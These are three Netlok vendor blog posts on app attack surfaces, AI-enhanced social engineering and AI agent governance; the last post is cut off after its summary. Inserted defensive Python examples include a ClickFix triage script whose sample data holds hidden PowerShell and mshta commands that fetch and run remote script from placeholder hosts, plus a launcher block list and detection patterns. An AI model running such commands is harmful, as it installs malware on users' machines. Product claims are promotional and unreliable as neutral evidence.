Kasey Cromer, Netlok | February 23, 2026

Executive Summary 

Your employees rely on dozens of mobile and desktop apps every day to collaborate, communicate, and get work done. Attackers know this. In 2025, 83% of organizations surveyed experienced app-targeted attacks, up from 65% the year before (Digital.ai). Infostealers harvested 1.8 billion credentials (DeepStrike). Importantly, 80% of employees now use apps that IT never approved (Microsoft). 

The result is an authentication crisis hiding in plain sight. Every app is an entry point. Every login is a potential vulnerability. And most security tools still focus on protecting internal assets while leaving mobile, web, and desktop apps exposed to attacks that happen outside the corporate firewall. 

Here’s what security leaders need to understand: 

1) Apps have become the dominant attack surface. Credential theft, OAuth token abuse, and infostealer malware all target the authentication layer that apps rely on. 

2) Shadow IT is no longer the exception. With employees adopting unsanctioned apps and AI tools without oversight, organizations face authentication blind spots they cannot control. 

3) Photolok Passwordless IdP addresses this gap by providing identity verification that works across apps, integrates with existing systems like Okta Workforce, and gives attackers nothing to steal, intercept, or replay. 

The App Attack Surface in 2026 

Apps and identity now form a single, concentrated attack surface. The chart below shows how these risks converge—app-targeted attacks climbing year over year, most employees on unsanctioned apps, and a majority of SaaS accounts still running without MFA, while nearly half of attacks trace back to shadow IT. 
 
[Chart: App-Based Security Threats (2024-2025). Apps and identity are now the primary enterprise attack surface. Source: Digital.ai, Verizon DBIR, Microsoft, SaaS Alerts, Zluri/analyst estimates (2025 data).]

The rest of this article unpacks what those numbers mean operationally for your security program. 

Mobile devices are no longer just communication tools. They are central to payments, identity verification, healthcare, and enterprise processes. Desktop apps handle everything from financial transactions to customer data. Each app authenticates users, often multiple times per day, creating thousands of potential entry points for attackers. 

Credential Theft at Scale 

The numbers are hard to ignore. DeepStrike’s 2025 analysis found that infostealer malware harvested 1.8 billion credentials in 2025 alone. These aren’t theoretical risks. Infostealers now operate as Malware-as-a-Service, with attackers deploying them through phishing emails, malicious apps, and compromised websites. 

In June 2025, researchers discovered what may be the largest credential exposure in history: roughly 16 billion login credentials compiled from infostealer logs, phishing kits, and prior breaches. The Verizon 2025 DBIR found that credential stuffing now accounts for 19% of all authentication attempts at mid-level companies, rising to 25% at large organizations.

Mobile Apps as Attack Vectors 

Mobile phishing has become significantly more effective than email. Spacelift’s 2026 research found that SMS phishing achieves click rates of 19% to 36%, compared to just 2% to 4% for email—up to nine times more effective. Mobile screens unintentionally hide full URLs and security indicators, making phishing links harder to detect (Spacelift). Users move quickly on their phones. And attackers exploit urgency with messages like “Your account is locked” or “Your package is arriving.” 

CompareCheapSSL reports that 63% of mobile users received a phishing SMS in the last 90 days. Malicious apps compound the problem. Researchers detected over 100,000 fake apps across major app stores in 2025 (CompareCheapSSL). These apps steal credentials, harvest data, and install backdoors that persist even after removal. And nearly a quarter of enterprise devices now host apps installed outside official app stores that bypass app store security entirely. 

Shadow IT and Unsanctioned Apps 

Employees aren’t being malicious—they’re trying to be productive. But every unsanctioned app introduces authentication touchpoints that IT cannot see or secure. IBM’s 2025 research found that the average enterprise uses 975 cloud services, but IT departments officially track only 108. The vast majority remain invisible to security teams. Analyst reports from Zluri and CloudEagle peg average shadow IT remediation costs above $4.2 million. Gartner predicts that by 2027, 75% of employees will use technology outside IT oversight. The perimeter has not just expanded. It has dissolved. 

Shadow AI: The Newest Blind Spot 

Generative AI has created a new category of shadow IT. Employees across departments use ChatGPT, Claude, DeepSeek, and other AI tools to write code, summarize data, and automate workflows. Many do so without IT approval or oversight. 

Komprise’s 2025 survey of IT executives found that 90% are concerned about shadow AI from a privacy and security standpoint. Nearly 80% have already experienced negative AI-related data incidents, and 13% report those incidents caused financial, customer, or reputational harm. Between 31% and 38% of AI-using employees enter sensitive work data into AI tools. Once that data leaves the organization, it may be logged, cached, or used for model retraining—permanently outside organizational control. 

The IBM Cost of a Data Breach Report found that shadow AI incidents add roughly $670,000 to the average breach cost, pushing totals to $5.11 million versus the $4.44 million global average. 

This is why identity-layer controls matter: you cannot control which AI tools employees actually use, but you can govern how they authenticate to reach sensitive data in the first place. 

OAuth and Third-Party App Risk 

Modern apps connect to enterprise systems through OAuth tokens, API keys, and session credentials. All of these grant access without requiring passwords at each interaction. If any of these are stolen from an unapproved app, attackers can impersonate legitimate users and access corporate data without triggering authentication alerts. 

Obsidian Security reports that the biggest SaaS breach of 2025 started with a compromised third-party app exploiting OAuth tokens, with a blast radius 10x greater than direct infiltration. More than 80% of apps are not federated behind the identity provider, meaning they operate outside SSO and MFA policies. These gaps create direct paths for attackers.

Why Traditional Authentication Is Failing 

These weaknesses show up first at the app layer, where users are authenticating dozens of times per day. Unfederated apps require their own passwords and credentials, separate from corporate SSO, multiplying the number of authentication touchpoints attackers can target. Every attack we’ve described exploits the same fundamental weakness: authentication systems that can be observed, intercepted, or replicated. 

Passwords remain the weakest link—the majority of hacking-related breaches still involve compromised credentials somewhere in the attack chain. AI and machine learning can now generate sophisticated phishing schemes and crack passwords far more efficiently than ever before. 

SMS codes can be intercepted through SIM swapping, which the FBI’s Internet Crime Complaint Center (IC3) says led to nearly 1,000 complaints and about $26 million in reported losses in 2024 alone in the U.S. Custom vishing kits can intercept one-time passwords in real time while attackers are on the phone with victims, turning a single SIM swap into a high-impact account takeover. 

Passkeys offer better phishing resistance than passwords, but the private key is often stored in device managers. If the device or manager is breached, it becomes a single point of compromise. 

Biometrics add convenience, but deepfakes, voice clones, and synthetic identity attacks are making biometric spoofing significantly easier. Once compromised, biometrics cannot be reset. 

Why Photolok Addresses the 2026 App Security Landscape 

Photolok is not another app. It is a Passwordless Identity Provider (IdP) that functions as the front door for your apps. It works with your existing systems, including Okta Workforce and other identity platforms. As an identity provider, Photolok verifies who users are before granting access to any application. By replacing passwords at this identity layer, Photolok secures authentication across every app your employees use, whether sanctioned or not. The apps themselves never see or store credentials. They simply trust Photolok’s verification. 

Steganographic photo-based authentication with AES-256 encryption: Photolok’s patented system embeds encrypted codes within photos, generating a new AES-256 code every session. Users authenticate by selecting from randomized photos only they would recognize—creating verification that cannot be observed and replayed like a password, intercepted like an SMS code, or deepfaked like a biometric. 

Randomized recognition challenges: Because photos are randomized every session, AI and machine learning tools have no pattern to learn and no credential to harvest. Unlike passwords or biometrics, there is no static data for attackers to brute-force or simulate. 

Device approval and fingerprinting: Users control which devices can access their account. Combined with device fingerprinting, this blocks unauthorized access attempts even if attackers somehow obtain login information. 

Situational security protection: Photolok is the only login method with built-in protection for high-risk situations. The Duress Photo acts as a visual silent alarm when users are coerced—whether through social engineering, insider pressure, or threats. The 1-Time Photo protects against shoulder surfing by removing itself after a single use. 

User-friendly and cost-effective: Point-and-click navigation with no passwords to remember or reset. This eliminates one of the most common IT support burdens while leveraging the brain’s natural picture-superiority effect for faster, more intuitive authentication. 

What Security Leaders Should Do Now 

1. Map your app attack surface. Identify all mobile, desktop, and SaaS apps that employees use—sanctioned and unsanctioned. Determine which apps are federated behind your IdP and which operate outside your authentication controls. 

2. Assume credentials have been compromised. With 1.8 billion credentials harvested in 2025 alone, the question is not whether your employees’ credentials are in attacker databases, but how you protect authentication when they are. Move beyond passwords and SMS codes for high-risk access. 

3. Address shadow IT at the identity layer realistically. You cannot control which apps employees actually use, but you can govern how they authenticate. Solutions like Photolok Passwordless IdP secure the identity layer regardless of what apps sit on top of it. 

4. Establish AI governance before shadow AI becomes a breach. Create clear policies for which AI tools are approved and how sensitive data should be handled. Monitor for unauthorized AI usage and provide approved alternatives that meet security requirements. 

5. Audit third-party app connections and integrations. Review which apps have access to your enterprise systems through OAuth tokens, API keys, and session credentials. Revoke unnecessary permissions and monitor for anomalous usage. 

The Bottom Line 

Your workforce runs on apps. So do attackers. Every mobile app, desktop application, and SaaS tool is an authentication touchpoint that attackers can exploit. And with 80% of employees using unsanctioned apps, you cannot secure what you cannot see. 

The answer is not to fight the app explosion—it is to secure the identity layer that apps depend on. Photolok Passwordless IdP secures authentication across your app ecosystem, integrates with systems like Okta Workforce, and gives attackers nothing to steal, intercept, or replay. 

These attacks show up as unplanned losses, regulatory scrutiny, and board-level questions about why known identity weaknesses were not addressed sooner. The tools exist. The question is whether your organization will deploy them before or after the breach. 


About the Author 

Kasey Cromer is Director of Customer Experience at Netlok. 

Sources 

[1] Digital.ai. “2025 Application Security Threat Report.” digital.ai 

[2] DeepStrike. “Stealer Log Statistics 2025.” deepstrike.io 

[3] Verizon. “2025 Data Breach Investigations Report.” verizon.com 

[4] Spacelift. “70 Social Engineering Statistics for 2026.” spacelift.io 

[5] CompareCheapSSL. “Mobile Security Statistics 2026.” comparecheapssl.com 

[6] Nudge Security. “Shadow IT Discovery Guide” (citing Microsoft). nudgesecurity.com 

[7] Fidelis Security. “Shadow IT Risks and Detection” (citing IBM). fidelissecurity.com 

[8] Zluri. “Shadow IT Statistics 2025.” zluri.com 

[9] CloudEagle. “Risks of Shadow IT.” cloudeagle.ai 

[10] CIO. “Shadow AI: Hidden Agents Beyond Governance.” cio.com 

[11] Bright Defense. “Data Breach Statistics 2026” (citing IBM). brightdefense.com 

[12] Obsidian Security. “What Is Shadow SaaS?” obsidiansecurity.com 

[13] GitProtect. “Cybersecurity Statistics 2026” (citing SaaS Alerts). gitprotect.io 

[14] FBI Internet Crime Complaint Center. “2024 Internet Crime Report.” ic3.gov 

[15] Netlok. “How Photolok Works.” netlok.com 

Kasey Cromer, Netlok | February 12, 2026

Executive Summary 

Social engineering has always exploited human psychology. In 2026, attackers have a new partner: artificial intelligence. AI-generated phishing campaigns now achieve success rates roughly four to five times higher than traditional attacks. Deepfake voice cloning requires as little as three seconds of audio. And purpose-built criminal tools can generate thousands of hyper-personalized attack messages in seconds. 

Here’s what security leaders need to understand: 

1) Social engineering is now cited as a leading cyber threat for 2026, with sharp year-over-year increases anticipated in the number of attempts, AI-generated campaigns, and business email compromise (BEC) losses. In 2025, 94% of businesses experienced at least one social engineering incident.

2) Attackers have moved beyond email to orchestrate multi-channel campaigns combining phishing, vishing, SMS, and deepfake video across platforms like Slack, Teams, and WhatsApp.

3) Traditional MFA is failing. The identity layer has become the primary battleground, and Photolok’s patented photo-based authentication addresses this gap directly with verification that AI cannot predict, clone, or replay.

Key Social Engineering Metrics  

| Metric | Finding | Source |
|---|---|---|
| Average cost of a phishing-driven breach | $4.88M per incident | IBM/Huntress 2025 |
| SMS phishing (smishing) vs. email phishing effectiveness | 19-36% click rate vs. 2-4% for email (up to 9x more effective) | Spacelift 2026 |
| Cloud breaches starting with compromised credentials | 46% of cloud breaches begin with stolen credentials, often obtained via social engineering | CompareCheapSSL 2025 |
| Training effectiveness (sustained vs. one-time) | One-time training reduces susceptibility by only 8%; continuous training improves effectiveness to 23% | CompareCheapSSL 2025 |
| Third-party involvement in breaches | 30% of breaches now involve third parties | Verizon DBIR 2025 |
| Small business survival rate post-breach | 60% shut down within 6 months after a major breach | Huntress 2025 |

The Five Social Engineering Trends Reshaping 2026 

1. AI-Powered Hyper-Personalization at Scale 

The old advice about spotting phishing (“look for spelling mistakes,” “check the tone”) is obsolete. Modern large language models produce grammatically flawless, contextually accurate messages that mirror your organization’s communication style. 

According to SecurityWeek’s Cyber Insights 2026 report, attackers now use AI to scrape social media activity, job roles, company updates, and even earnings calls to generate messages that feel authentic. The result? Phishing emails that reference your recent product launch, congratulate you on a promotion, or follow up on a project you discussed publicly. 

HYPR CEO Bojan Simic described the shift directly: “What once targeted human error now leverages AI to automate deception at scale. Deepfakes, synthetic backstories, and real-time voice or video manipulation are no longer theoretical; they are active, sophisticated threats designed to bypass traditional defenses and exploit trust gaps.” 

What makes this particularly dangerous is scale. Attackers can now launch hyper-personalized campaigns at mass phishing volume. The economics have shifted decisively in attackers’ favor. 

2. Deepfakes Move from Headlines to Standard Playbook 

Deepfakes are no longer fringe tools. They’re now a scalable part of social engineering campaigns, woven across entire attack chains rather than used as isolated tricks. 

The numbers tell the story: Gartner predicts that by the end of 2026, 30% of enterprises will no longer consider standalone identity verification and authentication solutions reliable in isolation. This shift reflects a stark reality: deepfake attacks bypassing biometric authentication increased 704% in 2023, and deepfake technology has only improved since.

Real attacks are already causing real damage. In one widely cited case, a finance employee authorized a transfer of roughly $25 million after joining what they believed was a legitimate video call with their CFO. Both the likeness and voice were deepfaked. In early 2026, X-PHY CEO Camellia Chan stated that “deepfakes will become the default social engineering tool by year-end 2026.” 

The barrier to entry has collapsed. Attackers now use voice cloning in phone calls with real-time synthesis that replicates an executive’s tone, cadence, and vocal signature. Short-form deepfake videos (15-30 seconds) are being embedded in WhatsApp messages and Slack channels, appearing as urgent updates from leadership. 

3. Vishing and Help Desk Attacks Surge 

Voice phishing (vishing) has transformed with AI voice-cloning tools. In multiple industries, vishing has replaced traditional phishing as the top social engineering threat. 

In January 2026, Okta’s threat researchers warned about custom phishing kits built for vishing being sold on dark web forums. These kits allow attackers to control authentication flows in real time while on the phone with victims. The attacker creates a custom phishing page, spoofs a phone number to impersonate the IT help desk, and convinces targets to visit the page under pretexts like “setting up a passkey” or “verifying account security.”

The ShinyHunters cyber extortion syndicate has already claimed access to major companies through exactly this technique: vishing Okta SSO credentials. Help desk staff become the weak link when they relax verification procedures to accommodate callers who sound panicked. 

These attacks succeed because caller ID is easily spoofed and still treated as partial proof of identity. High-impact actions like resetting MFA or granting access to sensitive tools are approved without verification over a separate, trusted channel.
 
Defenses include requiring callback verification to a known number (not one provided by the caller), implementing code-based verification where the help desk provides a code the caller must retrieve from their authenticated account, and training staff that urgency is itself a red flag. 
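The code-based verification step above, sketched as an added example that is not part of the original article or any Netlok or Okta product. The `HelpDeskVerifier` class, the ticket identifiers, the five-minute lifetime and the three-attempt limit are all assumptions chosen for illustration; the code is shown in the user's already-authenticated account session and the caller reads it back.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass

CODE_TTL_SECONDS = 300  # assumed policy: a code is valid for five minutes
MAX_ATTEMPTS = 3        # assumed policy: lock the challenge after three wrong read-backs


@dataclass
class Challenge:
    user_id: str
    action: str        # the one high-impact action this code can approve
    code_hash: bytes   # keyed hash only; the code itself is never stored
    expires_at: float
    attempts: int = 0
    used: bool = False


class HelpDeskVerifier:
    """Hypothetical help desk service: the code is delivered inside the user's
    already-authenticated account session and the caller reads it back."""

    def __init__(self, clock=time.time):
        self._key = secrets.token_bytes(32)
        self._clock = clock
        self._open = {}  # ticket_id -> Challenge

    def _digest(self, ticket_id, code):
        msg = f"{ticket_id}:{code}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).digest()

    def issue(self, ticket_id, user_id, action):
        """Return a fresh 6-digit code for display in the user's account portal.
        The agent does not read it out to the caller."""
        code = f"{secrets.randbelow(10**6):06d}"
        self._open[ticket_id] = Challenge(
            user_id, action, self._digest(ticket_id, code),
            self._clock() + CODE_TTL_SECONDS)
        return code

    def verify(self, ticket_id, user_id, action, spoken_code):
        """Check the code the caller reads back. Returns a status string."""
        ch = self._open.get(ticket_id)
        if ch is None:
            return "no_challenge"
        if ch.used:
            return "already_used"
        if ch.attempts >= MAX_ATTEMPTS:
            return "locked"
        if self._clock() > ch.expires_at:
            return "expired"
        if (ch.user_id, ch.action) != (user_id, action):
            return "binding_mismatch"  # code was issued for another user or action
        ch.attempts += 1
        if not hmac.compare_digest(ch.code_hash, self._digest(ticket_id, spoken_code)):
            return "locked" if ch.attempts >= MAX_ATTEMPTS else "wrong_code"
        ch.used = True  # single use: a replayed code is rejected
        return "verified"


if __name__ == "__main__":
    desk = HelpDeskVerifier()
    code = desk.issue("TICKET-1", "alice", "mfa_reset")
    print(desk.verify("TICKET-1", "alice", "mfa_reset", code))  # verified
    print(desk.verify("TICKET-1", "alice", "mfa_reset", code))  # already_used
```

A caller who cannot sign in to retrieve the code fails this check by design and falls back to the callback procedure.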

4. ClickFix: The Attack That Makes You Infect Yourself 

A concerning trend has emerged rapidly through 2025 and into 2026: ClickFix attacks. These campaigns use fake CAPTCHA prompts or browser error messages to trick users into running malicious commands on their own computers. 

The attack is deceptively simple. You land on a webpage showing what looks like a CAPTCHA (“Verify you are human”) or a browser error (“Update required”). The prompt tells you to press Windows+R to open the Run dialog. You’re then instructed to paste (Ctrl+V) and press Enter. What you don’t realize is that malicious code was silently copied to your clipboard when you clicked the fake prompt. 

Microsoft, SentinelOne, and Proofpoint have all documented active ClickFix campaigns. The technique has been adopted by nation-state actors including Kimsuky (North Korea), MuddyWater (Iran), and APT28 (Russia). Criminal groups use it to deliver infostealers like Lumma Stealer and remote access trojans.

ClickFix works because it exploits user fatigue with anti-spam mechanisms and bypasses conventional security tools. The user executes the malware themselves, so there’s no exploit to detect. 
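Because the user pastes the command into the Run dialog, Windows records it in the per-user RunMRU registry key, which gives responders something to check after the fact. The triage script below is an added example, not code from the original article or from the vendors it cites; the sample registry values are constructed with placeholder hosts, and the launcher list, signal patterns and flagging rule are assumptions to tune for your environment.

```python
import re

# Constructed sample of a per-user RunMRU registry key
# (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which keeps
# what was typed or pasted into the Win+R dialog. Values end in "\1" and
# MRUList gives the order, newest first. Hosts are placeholders.
SAMPLE_RUNMRU = {
    "MRUList": "ecdba",
    "a": r"notepad\1",
    "b": r"cmd /c ipconfig /all\1",
    "c": r'powershell -w hidden -c "iwr https://cdn.example.invalid/v.txt | iex"'
         r" # I am not a robot: reCAPTCHA ID 4821\1",
    "d": r"\\fileserver.example.invalid\share\1",
    "e": r'"C:\Windows\System32\mshta.exe" https://files.example.invalid/check.hta\1',
}

# Programs that can fetch or run script content when started from the Run box.
LAUNCHERS = {"powershell", "pwsh", "cmd", "mshta", "msiexec", "curl", "certutil",
             "rundll32", "regsvr32", "wscript", "cscript", "bitsadmin"}

SIGNALS = [
    ("remote_source", re.compile(r"https?://|\\\\[\w.-]+\\", re.I)),
    ("hidden_window", re.compile(r"\s-w\w*\s+(?:h\w*|1)\b", re.I)),
    ("encoded_command", re.compile(r"\s-e(?:c|nc\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_and_run", re.compile(r"\b(?:iex|iwr|irm|invoke-\w+|downloadstring)\b", re.I)),
    # Trailing comment that makes the visible end of the Run box look like a CAPTCHA step.
    ("lure_text", re.compile(r"(?:#|\brem\b).*\b(?:robot|captcha|human|verif\w*)", re.I)),
]


def parse_runmru(values):
    """Return Run-dialog commands, newest first, with the trailing marker removed."""
    out = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is not None:
            out.append(raw[:-2] if raw.endswith("\\1") else raw)
    return out


def _launcher(cmd):
    """Base name of the program the command starts, lower-cased, without .exe."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmd)
    first = (m.group(1) or m.group(2)) if m else ""
    name = first.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def clickfix_signals(cmd):
    """List the signals present in one command, launcher first if there is one."""
    name = _launcher(cmd)
    found = [f"launcher:{name}"] if name in LAUNCHERS else []
    found += [label for label, rx in SIGNALS if rx.search(cmd)]
    return found


def triage(values):
    """Flag entries where a script launcher is combined with at least one
    other signal; a bare cmd or powershell in Run is normal admin use."""
    flagged = []
    for cmd in parse_runmru(values):
        sig = clickfix_signals(cmd)
        if sig and sig[0].startswith("launcher:") and len(sig) > 1:
            flagged.append((cmd, sig))
    return flagged


if __name__ == "__main__":
    for cmd, sig in triage(SAMPLE_RUNMRU):
        print(", ".join(sig), "<-", cmd[:60])
```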

5. Agentic AI and Multi-Channel Coordinated Attacks 

Social engineering no longer arrives through a single channel, and it’s no longer manually orchestrated. Agentic AI is turning social engineering into an end-to-end automated operation, from reconnaissance to outreach to post-compromise lateral movement. 

Forrester predicts that chains of specialized AI agents are emerging: some focus on reconnaissance, others craft lures, others manage infrastructure, together enabling mostly autonomous social engineering operations. Attackers now orchestrate campaigns across email, phone, SMS, and collaboration platforms simultaneously. 

A common flow: an email warning about suspicious activity, followed by a vishing call to “confirm your details.” Or a convincing voice message backed up by a phishing link via SMS. If the target ignores one channel, the attacker pivots to another. 

Cloud Range’s 2026 analysis found that attackers combine real user data from breaches, AI-generated personas, and automated messaging systems to deceive employees and consumers at scale. Detection and response must focus on interaction patterns, not single events. 
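Correlating on interaction patterns rather than single events can start as simply as grouping per-user reports across channels. This is an added example, not part of the original article or of Cloud Range's analysis; the event tuples are constructed, and the 30-minute gap and two-channel threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # assumed: max gap between steps of one sequence
MIN_CHANNELS = 2                # assumed: channels needed before raising an incident

# Constructed sample: (time, targeted user, channel, what was reported or detected)
SAMPLE_EVENTS = [
    ("2026-02-03T09:02:00", "a.rivera", "email", "suspicious-activity warning reported"),
    ("2026-02-03T09:11:00", "a.rivera", "voice", "inbound call claiming to be IT help desk"),
    ("2026-02-03T09:14:00", "a.rivera", "sms", "link to unrecognized sign-in page"),
    ("2026-02-03T09:20:00", "j.chen", "email", "phishing report"),
    ("2026-02-03T13:45:00", "j.chen", "sms", "delivery-themed smishing report"),
    ("2026-02-03T10:00:00", "m.okafor", "email", "phishing report"),
    ("2026-02-03T10:05:00", "m.okafor", "email", "second phishing report"),
]


def correlate(events, window=WINDOW, min_channels=MIN_CHANNELS):
    """Group each user's events into sequences (consecutive events no more than
    `window` apart) and return the sequences that span several channels."""
    by_user = defaultdict(list)
    for ts, user, channel, detail in events:
        by_user[user].append((datetime.fromisoformat(ts), channel, detail))

    incidents = []
    for user in sorted(by_user):
        cluster = []
        # The trailing None flushes the last open sequence for this user.
        for item in sorted(by_user[user]) + [None]:
            if item is not None and (not cluster or item[0] - cluster[-1][0] <= window):
                cluster.append(item)
                continue
            # Channels in order of first appearance, e.g. email -> voice -> sms.
            channels = list(dict.fromkeys(c for _, c, _ in cluster))
            if len(channels) >= min_channels:
                incidents.append({
                    "user": user,
                    "start": cluster[0][0],
                    "end": cluster[-1][0],
                    "channels": channels,
                    "events": len(cluster),
                })
            cluster = [item] if item is not None else []
    return incidents


if __name__ == "__main__":
    for inc in correlate(SAMPLE_EVENTS):
        print(inc["user"], " -> ".join(inc["channels"]),
              f"({inc['events']} events, {inc['end'] - inc['start']})")
```

Each single event here would be low priority on its own; only the per-user sequence across email, voice and SMS raises an incident.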

Why Traditional MFA Is Failing 

Here’s the uncomfortable truth: traditional multi-factor authentication is increasingly being defeated. 

The custom vishing kits documented by Okta in January 2026 can intercept SMS or voice one-time passwords, push-based MFA, and app-based time-based one-time passwords. Because attackers can control the pages shown to targets and synchronize them with spoken instructions, they can defeat any MFA that is not phishing-resistant.

The research firm Xcitium reported a 45% year-over-year rise in 2FA phishing attacks in 2025, with global damages recorded at $1.2 billion, noting that over 70% of targeted corporate attacks now involve some form of 2FA bypass. 

Phishing-resistant MFA options like FIDO2/WebAuthn security keys, passkeys, and certificate-based authentication offer stronger protection. But most organizations haven’t deployed them broadly, leaving employees vulnerable to attacks that bypass what they believe is strong authentication. 

Why Photolok Addresses the 2026 Threat Landscape 

Every attack we’ve described exploits the same fundamental weakness: authentication systems that can be observed, intercepted, or replicated. Passwords can be phished. SMS codes can be intercepted. Push notifications can be socially engineered. Even biometrics face growing threats from deepfakes. 

This is why we built Photolok at Netlok. Photolok’s patented photo-based authentication uses steganographic-coded images that randomize every session. Authentication relies on cognitive recognition: users select from photos only they would recognize. Because the photo set is randomized each session, a selection that is observed cannot be reused by an attacker, intercepted in transit like an SMS code, or deepfaked like biometric data.

Against AI-powered social engineering: Because Photolok’s login process uses dynamic photo randomization and embedded steganographic codes, AI and machine learning tools have no pattern to learn and no credential to harvest. 

Against vishing and help desk attacks: When an employee is pressured to ‘verify their identity’ over the phone, Photolok’s visual selection process resists transfer to an attacker. Even if the user describes their photo, the attacker must identify it from a randomized set of images, making accurate selection more difficult. There’s nothing to read aloud, nothing to type into a fake portal. 

Against coercion scenarios: The Duress Photo feature addresses what happens when social engineering succeeds at the human level. If someone is being coerced into authenticating, whether through manipulation, insider pressure, or threats, they can select a designated photo that grants access but silently alerts security. In an era where AI makes social engineering more convincing than ever, this silent alarm provides a critical safety net. 

What Security Leaders Should Do Now 

1. Assume your employees will be targeted with AI-enhanced attacks. Training that focuses on spelling errors and generic greetings is obsolete. Update awareness programs to address AI-generated content, deepfake audio and video, and multi-channel attack sequences. 

2. Deploy phishing-resistant authentication. Traditional MFA is no longer sufficient for high-risk roles and sensitive systems. Evaluate solutions like Photolok that resist the specific attack vectors dominating 2026: credential interception, real-time phishing proxies, and AI-powered impersonation. 

3. Harden help desk and support workflows. Require callback verification to a pre-verified contact number for high-impact actions like MFA resets, password changes, and access grants. Caller ID and caller-supplied callback numbers should never be treated as proof of identity.

4. Implement detection for multi-channel attack patterns. Single-channel monitoring misses coordinated campaigns. Security operations should correlate suspicious activity across email, voice, SMS, and collaboration platforms. 

5. Establish verification protocols for financial transactions. Any request involving wire transfers, payment changes, or sensitive data should require confirmation through a channel the attacker cannot control. 

6. Brief leadership on the AI-enhanced threat landscape. Social engineering losses are a board-level issue. Ensure executives understand that the attacks of 2026 look nothing like the phishing emails they remember. 

The Bottom Line 

Social engineering has always been about exploiting human trust. In 2026, AI has made that exploitation faster, more convincing, and infinitely scalable. Attackers can clone voices from seconds of audio, generate thousands of personalized attack messages instantly, and orchestrate multi-channel campaigns that adapt in real time. 

These attacks show up as unplanned losses, regulatory scrutiny, and board-level questions about why known identity weaknesses were not addressed sooner. They are not just IT incidents; they are enterprise risk events. 

The organizations that will avoid becoming the next cautionary tale are those investing in authentication that cannot be socially engineered: systems where there’s nothing to intercept, nothing to replay, and nothing an AI can learn to predict. 

Photolok addresses this reality directly. When the attack exploits human psychology, the defense must go beyond human vigilance. 

The tools exist. The question is whether your organization will deploy them before or after the breach. 


Sources 

[1] ZeroFox Intelligence. “2026 Cyber Threat Predictions and Recommendations.” December 2025. https://www.zerofox.com/blog/2026-cyber-threat-predictions/ 

[2] SecurityWeek. “Cyber Insights 2026: Social Engineering.” January 2026. https://www.securityweek.com/cyber-insights-2026-social-engineering/ 

[3] Cloud Range. “5 Key Social Engineering Trends in 2026.” January 2026. https://www.cloudrangecyber.com/news/5-key-social-engineering-trends-in-2026 

[4] Hoxhunt. “Vishing Attacks Surge 442%.” December 2025. https://hoxhunt.com/blog/vishing-attacks 

[5] Help Net Security. “Okta Users Under Attack: Modern Phishing Kits Are Turbocharging Vishing Attacks.” January 2026. https://www.helpnetsecurity.com/2026/01/23/okta-vishing-adaptable-phishing-kits/ 

[6] BetaNews. “AI as a Target, Web-Based Attacks and Deepfakes: Cybersecurity Predictions for 2026.” January 2026. https://betanews.com/2025/12/22/ai-as-a-target-web-based-attacks-and-deepfakes-cybersecurity-predictions-for-2026/ 

[7] Keepnet Labs. “250+ Phishing Statistics and Trends You Must Know in 2026.” January 2026. https://keepnetlabs.com/blog/top-phishing-statistics-and-trends-you-must-know 

[8] Keepnet Labs. “Deepfake Statistics and Trends 2025.” November 2025. https://keepnetlabs.com/blog/deepfake-statistics-and-trends 

[9] DeepStrike. “Deepfake Statistics 2025: AI Fraud Data and Trends.” September 2025. https://deepstrike.io/blog/deepfake-statistics-2025 

[10] Hoxhunt. “Business Email Compromise Statistics 2026.” January 2026. https://hoxhunt.com/blog/business-email-compromise-statistics 

[11] FBI IC3. “Business Email Compromise: The $55 Billion Scam.” September 2024. https://www.ic3.gov/PSA/2024/PSA240911 

[12] Abnormal AI. “Threat Report: BEC and VEC Attacks Show No Signs of Slowing.” November 2025. https://abnormal.ai/blog/bec-vec-attacks 

[13] Microsoft Security Blog. “Think Before You Click(Fix): Analyzing the ClickFix Social Engineering Technique.” August 2025. https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/ 

[14] Proofpoint. “ClickFix Social Engineering Technique Floods Threat Landscape.” February 2025. https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape 

[15] SentinelOne. “Caught in the CAPTCHA: How ClickFix Is Weaponizing Verification Fatigue.” May 2025. https://www.sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/ 

[16] Xcitium Threat Labs. “Unmasking Sneaky 2FA: How Modern Phishing Kits Bypass MFA in 2026.” January 2026. https://threatlabsnews.xcitium.com/blog/unmasking-sneaky-2fa-how-modern-phishing-kits-bypass-mfa-in-2026/ 

[17] Jericho Security. “Voice Phishing Is Rising: Why ‘Just a Phone Call’ Is Now a Real Threat.” February 2026. https://www.jerichosecurity.com/blog/voice-phishing-vishing-prevention 

[18] Netlok. “How Photolok Works.” 2025. https://netlok.com/how-it-works/ 

[19] Spacelift. “Social Engineering Statistics.” 2025. https://spacelift.io/blog/social-engineering-statistics 

[20] Forrester. “Predictions 2026: Cybersecurity and Risk.” October 2025. https://www.forrester.com/blogs/predictions-2026-cybersecurity-and-risk/ 

[21] Huntress. “Impact of Social Engineering: Key Statistics on Businesses.” 2025. https://www.huntress.com/social-engineering-guide/impact-of-social-engineering-key-statistics-on-businesses 

[22] CompareCheapSSL. “100+ Social Engineering Statistics in 2025.” December 2025. https://comparecheapssl.com/100-social-engineering-statistics-in-2025-the-latest-stats-and-trends-revealed 

[23] Keepnet Labs. “Security Awareness Training Statistics.” January 2026. https://keepnetlabs.com/blog/security-awareness-training-statistics 

Kasey Cromer, Netlok | January 27, 2026

Executive Summary

Autonomous AI agents are now executing code, authorizing payments, and modifying systems across enterprise environments. According to PwC’s 2025 AI Agent Survey, 79% of organizations are already adopting AI agents, with Gartner predicting that 40% of enterprise applications will feature task-specific AI agents by the end of 2026 (up from less than 5% in 2025). The transformation is happening at unprecedented speed, and most organizations are deploying these systems without the governance frameworks needed to prevent systemic failures, regulatory violations, board-level accountability crises, and missed ROI targets. MIT research found that 95% of enterprise generative AI projects fail to deliver measurable financial returns, often because of inadequate governance and poor data foundations. 

